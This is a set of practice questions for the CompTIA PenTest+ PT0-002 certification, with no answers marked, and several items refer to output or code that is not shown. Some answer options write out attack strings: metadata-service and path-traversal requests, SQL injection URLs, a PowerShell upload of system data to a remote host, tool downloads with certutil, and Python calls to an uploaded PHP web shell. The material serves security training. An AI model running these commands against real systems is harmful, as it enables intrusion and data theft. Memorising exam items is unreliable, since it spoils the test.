Test E CompTIA pentest+ PT0-002

Description:
CompTIA pentest+ PT0-002

Creation Date: 2024/09/16

Category: Others

Number of questions: 68

Content:

During a routine penetration test of a customer’s physical data center, a penetration tester observes that no changes have been made to the production firewalls in more than five years. Which of the following is the most appropriate remediation technique to reduce the risk of future security breaches?. Video surveillance. Biometric controls. Password encryption. SSH key rotation.

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands: curl http://169.254.169.254/latest Which of the following attacks is the penetration tester more likely trying to perform?. Metadata service attack. Container escape techniques. Credential harvesting. Resource exhaustion.

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients: nmap -sX -T4 -p 21-25,67,80,139,8080 192.168.11.191 The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?. All of the ports in the target range are closed. Nmap needs more time to scan the ports in the target range. The ports in the target range cannot be scanned because they are common UDP ports. All of the ports in the target range are open.

In Java and C/C++, variable initialization is critical because: the unknown value, when used later, will cause unexpected behavior. the compiler will assign null to the variable, which will cause warnings and errors. the initial state of the variable creates a race condition. the variable will not have an object type assigned to it.

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output: Which of the following should the penetration tester include in the report?. Old, insecure ciphers are in use. The 3DES algorithm should be deprecated. 2,048-bit symmetric keys are incompatible with MD5. This server should be upgraded to TLS 1.2.

A penetration tester is reviewing the security of a web application running in an IaaS compute instance. Which of the following payloads should the tester send to get the running process credentials?. file=http://192.168.1.78?+document.cookie. file=../../../proc/self/environ. file='%20or%2054365=54365;--. file=http://169.254.169.254/latest/meta-data/.

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user workstations. Which of the following should be included in the recommendations for remediation?. Start a training program on proper access to the web server. Build a patch-management program for the web server. Place the web server in a screened subnet. Implement endpoint protection on the workstations.

In a wireless network assessment, penetration testers would like to discover and gather information about accessible wireless networks in the target area. Which of the following is the most suitable method of finding this information?. Token scoping. RFID cloning. Wardriving. WAF detection. Jamming.

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?. OWASP. MITRE ATT&CK. PTES. NIST.

A penetration tester is performing an assessment against a customer’s web application that is hosted in a major cloud provider’s environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization’s WAF. Which of the following attacks would be most likely to succeed?. Reflected XSS. Brute-force. DDoS. Direct-to-origin.

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output: Which of the following is the penetration tester conducting?. Port scan. Brute force. Credential stuffing. DoS attack.

During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants to identify key contacts and job responsibilities within the company. Which of the following techniques would be the most effective for this situation?. Social media scraping. Website archive and caching. DNS lookup. File metadata analysis.

Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?. Non-disclosure agreement. Business associate agreement. Assessment scope and methodologies. Executive summary.

A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?. Add the passwords to an appendix in the penetration test report. Do nothing. Using passwords from breached data is unethical. Contact the client and inform them of the breach. Use the passwords in a credential stuffing attack when the external penetration test begins.

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?. nmap -sU -p 1-1024 10.0.0.15. nmap -p 22,25,80,3389 -T2 10.0.0.15 -Pn. nmap -T5 -p 1-65535 -A 10.0.0.15. nmap -T3 -F 10.0.0.15.

A penetration tester runs the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?. Set the SGID on all files in the /directory. Find the /root directory on the system. Find files with the SUID bit set. Find files that were created during exploitation and move them to /dev/null.

Which of the following tools provides Python classes for interacting with network protocols?. Responder. Impacket. Empire. PowerSploit.

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet. Which of the following commands should the engineer use to achieve the objective in the least amount of time?. nmap -T3 -p 80 10.0.0.0/16 --max-hostgroup 100. nmap -T0 -p 80 10.0.0.0/16. nmap -T4 -p 80 10.0.0.0/16 --max-rate 60. nmap -T5 -p 80 10.0.0.0/16 --min-rate 80.

A penetration tester is performing a social engineering penetration test and was able to create a remote session. Which of the following social engineering techniques was most likely successful?. SMS phishing. Dumpster diving. Executive impersonation attack. Browser exploitation framework.

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?. ROE. SLA. NDA. SOW.

A penetration tester is conducting an engagement for a company and has identified a vulnerable web application. During the reconnaissance phase the tester discovers that the internal web application contains end-of-life components. Which of the following is the most appropriate next step?. Report the vulnerability to the company's IT department and provide the department with detailed information for patching the application. Perform a brute-force attack on the web application's log-in page to test the strength of user passwords. Launch a denial-of-service attack against the web application to disrupt its availability and expose potential vulnerabilities. Exploit the vulnerability to gain access to the web application's back-end systems.

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?. Performing a live demonstration of the results to the system administrators. Scheduling of follow-up actions and retesting. Attestation of findings and delivery of the report. Review of the lessons during the engagement.

A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?. nmap -oG list.txt 192.168.0.1-254 | sort. nmap -sn 192.168.0.1-254 | grep "Nmap scan" | awk '{print $5}'. nmap --open 192.168.0.1-254 | uniq | sed 's/Nmap//2' > file.txt. nmap -O 192.168.0.1-254 | cut -f.

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take?. Perform forensic analysis to isolate the means of compromise and determine attribution. Incorporate the newly identified method of compromise into the red team’s approach. Create a detailed document of findings before continuing with the assessment. Halt the assessment and follow the reporting procedures as outlined in the contract.

A penetration tester identified numerous flaws that could lead to unauthorized modification of critical data. Which of the following would be best for the penetration tester to recommend?. Flat access. Role-based access control. Permission-based access control. Group-based control model.

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?. Drozer. Burp Suite. Android SDK Tools. MobSF.

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?. Secondary. Emergency. Technical. Primary.

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a minimal chance of detection? (Choose two.). Open-source research. A ping sweep. Traffic sniffing. Port knocking. A vulnerability scan. An Nmap scan.

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code: Which of the following was the script author trying to do?. Spawn a local shell. Disable NIC. List processes. Change the MAC address.

During an assessment, a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web servers. Which of the following actions should the penetration tester perform next?. Continue the assessment and mark the finding as critical. Attempt to remediate the issue temporarily. Notify the primary contact immediately. Shut down the web server until the assessment is finished.

During an assessment, a penetration tester obtains a list of password digests using Responder. Which of the following tools would the penetration tester most likely use next?. Hashcat. Hydra. CeWL. Medusa.

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?. Use Nmap's -T2 switch to run a slower scan and with less resources. Run the scans using multiple machines. Run the scans only during lunch hours. Use Nmap's --host-timeout switch to skip unresponsive targets.

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester start this process?. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt'). schtasks /query /fo LIST /v | find /I "Next Run Time:". wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe.

A penetration tester issues the following command after obtaining a shell: Which of the following describes this technique?. Establishing a backdoor. Privilege escalation. PowerShell remoting. Living-off-the-land.

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization’s sensitive files?. Remote file inclusion. Cross-site scripting. SQL injection. Insecure direct object references.

While conducting a penetration test of a web application, the penetration tester enters the following URI: http://test.comptia.com/../../../../etc/shadow Which of the following attacks is the tester attempting?. XML injection. SQL injection. Directory traversal. Buffer overflow.

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate background checks: Which of the following candidates should MOST likely be excluded from consideration?. Candidate 1. Candidate 2. Candidate 3. Candidate 4.

Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?. Engagement scope. Communication escalation path. SLA. SOW.

Given the following Bash code snippet: Which of the following would be achieved?. User enumeration. Directory brute-force attack. Port scan. File download.

Given the following user-supplied data: www.comptia.com/info.php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing?. Boolean-based SQL injection. Time-based SQL injection. Stored cross-site scripting. Reflected cross-site scripting.

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following BEST explains why the penetration tester should immediately obscure portions of the images before saving?. To maintain confidentiality of data/information. To avoid disclosure of how the hashes were obtained. To make the hashes appear shorter and easier to crack. To prevent analysis based on the type of hash.

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?. CeWL. John the Ripper. Hashcat. Hydra.

Given the following code: Which of the following tasks could be accomplished with the script?. Reverse shell. Ping sweep. File download. Port scan.

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?. DirBuster. Open VAS. Scout Suite. CeWL.

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output: Which of the following is the MOST likely explanation for the output?. The tester is not using a valid SSL certificate. The admin directory cannot be fuzzed because it is forbidden. The admin, test, and db directories redirect to the log-in page. The robots.txt file has six entries in it.

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?. Kismet. Burp Suite. BeEF. WHOIS.

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content: Which of the following commands should the penetration tester run to successfully achieve RCE?. python3 -c "import requests;print(requests.post(url='http://172.16.200.10/uploads/shell.php',data={'cmd=id'}))". python3 -c "import requests;print(requests.post(url='http://172.16.200.10/uploads/shell.php',data={'cmd': 'id'}).text)". python3 -c "import requests;print(requests.get(url='http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}))". python3 -c "import requests;print(requests.get(url='http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}).test)".

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code: salt = 'saltl23' hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) The penetration tester recommended the code be updated to the following: salt = os.urandom(32) hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?. Changing passwords that were created before this code update. Storing hashes created by both methods for compatibility. Rehashing all old passwords with the new code. Updating the SHA-256 algorithm to something more secure.

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?. OWASP Top 10. MITRE ATT&CK. Cyber Kill Chain. Well-Architected Framework.

An organization wants to identify whether a less secure protocol is being utilized on a wireless network. Which of the following types of attacks will achieve this goal?. False negotiation. Collision. Bad handshake. Downgrade.

While a penetration tester conducts a web application assessment, the following URL is accessed: http://comptia.com/index.php?id=1%20ORR%2022-7%3d10 Which of the following exploit types is being attempted?. XML injection. SQL injection. Session hijacking. Buffer overflow.

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?. dig company.com MX. whois company.com. curl www.company.com. dig company.com A.

A penetration tester runs an Nmap scan and obtains the following output: Which of the following commands should the penetration tester try next to explore this server?. nikto -host http://10.22.2.2. hydra -l administrator -P passwords.txt ftp://10.22.2.2. nmap -p 3389 --script vnc-info.nse 10.22.2.2. medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql.

During a reconnaissance exercise, a penetration tester runs the following Nmap command: nmap -sT -sV -T2 -p 1-65535 domain.com After watching the scan run for more than two hours, the tester wants to optimize the full scan. Which of the following is the best way to speed up the scan?. Scan fewer ports list. Scan via UDP to improve speed. Change -sT to -sS. Keep the scan timing.

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?. Executive summary. Vulnerability severity rating. Recommendations of mitigation. Methodology.

A penetration tester is scanning a customer subnet and wants to scan ports that are known to have only well-known UDP services present. Which of the following can the tester use to scan for SNMP, NTP, NetBIOS, and DNS?. nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan. nmap -vv -sXV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan. nmap -vv -sTV -p 53, 123, 137-139,161,123 192.168.1.0/24 -oA udpscan. nmap -vv -sUV -p 53-161,192.168.1.0 -oA udpscan.

Which of the following OSSTM testing methodologies should be used to test under the worst conditions?. Tandem. Reversal. Semi-authorized. Known environment.

A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking the penetration tester's attack attempts. Which of the following should the tester do to best ensure the attacks will be more successful?. Increase the volume of attacks to enable more to possibly slip through. Vary the use of upper and lower case characters in payloads to fool the WAF. Use multiple source IP addresses for the attack traffic to prevent being blocked. Locate the company's servers that are hosting the API and send the traffic there.

A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remembers the use of the -t option. Which of the following should be considered when using this option?. The number of connects in parallel per target. The number of task connects in parallel overall. The waiting time for a response between connects per threads. If the output shows log-ins and passwords for each attempt.

During a security assessment, a penetration tester decides to use the following Python snippet: Which of the following best describes what the penetration tester is trying to achieve?. Web server denial of service. Web application firewall bypass. Web server response time estimation. Web server latency estimation.

An organization’s Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?. Client acceptance. Data destruction process. Attestation of findings. Lessons learned.

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?. Include the findings in the final report. Notify the client immediately. Document which commands can be executed. Use this feature to further compromise the server.

A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?. To facilitate post-engagement cleanup. To monitor lessons learned. To foster client acceptance. To follow the data destruction process.

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?. Operating cost. Required scope of work. Non-disclosure agreement. Client's budget.

While performing a mobile application penetration test, a security consultant notices that the user password is being locally encrypted before it is sent to the back end for authentication. Which of the following techniques would be best for the consultant to use to find the encryption algorithm and the encryption key?. Sandbox analysis. Information leakage. Reverse engineering. Brute-force attack.

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?. nmap -vv -sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan. nmap -vv -sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan. nmap -vv -sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan. nmap -vv -sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan.

A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the following is the best Nmap command for this task?. nmap 10.7.8.69 -sS -sA -sV -F. nmap 10.7.8.69 -sT -sA -p1-65535. nmap 10.7.8.69 -sC -sV -Pn. nmap 10.7.8.69 -sX -sU --top-ports.

A penetration tester is gathering information and wants to retrieve hostnames and IP addresses. Which of the following should the tester do?. Obtain password dumps. Implement SSL/TLS certificate analysis. Perform DNS lookups. Conduct web scraping.
